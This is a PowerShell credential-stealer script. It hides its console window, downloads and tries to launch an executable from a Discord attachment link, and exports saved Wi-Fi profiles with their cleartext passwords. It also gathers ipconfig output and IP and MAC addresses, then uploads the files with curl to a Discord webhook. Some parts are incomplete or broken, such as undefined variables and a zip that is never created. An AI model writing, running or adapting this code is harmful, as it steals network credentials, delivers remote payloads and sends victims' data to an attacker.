Add-Type -Name Window -Namespace Console -MemberDefinition '
[DllImport("Kernel32.dll")]
public static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);
'
$consolePtr = [Console.Window]::GetConsoleWindow()
[Console.Window]::ShowWindow($consolePtr, 0)     

Invoke-WebRequest 'https://cdn.discordapp.com/attachments/975173196103966800/1435755657705029790/fun.exe?ex=690d1f27&is=690bcda7&hm=b2aad148ae82f9f7533f919ccdbe006c76d041af5dab43587d910bf9de9d3466&' -OutFile "$env:LOCALAPPDATA\Temp\fun.exe" ; "$env:LOCALAPPDATA\Temp\fun.exe"

$e = "$env:LOCALAPPDATA\Temp"
$zip = "$env:TEMP\funny_stuff_folder.zip"
ipconfig /all | Out-File "$e\ipcfg.txt"
netsh wlan export profile key=clear folder=$e | Out-Null

$wifiFile = "$e\wifi.txt"
Get-ChildItem "$e\Wi-Fi*.xml" | ForEach-Object {
    $x = [xml](Get-Content $_)
    $ssid = $x.WLANProfile.SSIDConfig.SSID.name
    $pass = $x.WLANProfile.MSM.Security.SharedKey.KeyMaterial
    "SSID:$ssid | Password:$pass" | Out-File -Append -FilePath $wifiFile
}


$ipv4 = ipconfig /all | Select-String "IPv4 Address" | ForEach-Object { ($_ -split ':')[-1].Trim() }
$ipv6 = ipconfig /all | Select-String "IPv6 Address" | ForEach-Object { ($_ -split ':')[-1].Trim() }
$mac = ipconfig /all | Select-String "Physical Address" | ForEach-Object { ($_ -split ':')[-1].Trim() }



# Send to discord



$whoami_content = whoami
"content=@everyone: $whoami_content"
curl.exe -X POST $wh -F "file1=@$zip" -F "file2=@$wifiFile" -F "file3=@$e\ipcfg.txt" *> $null
Remove-Item $BodyFile   

# cleanup
#cls
#Remove-Item -Path "$wifiFile" -Force
#Remove-Item -Path "$e\ipcfg.txt" -Force
#Remove-Item -Path "$zip" -Force


#exit quickly
#taskkill /F /IM pwsh.exe /IM powershell.exe 2>$null 
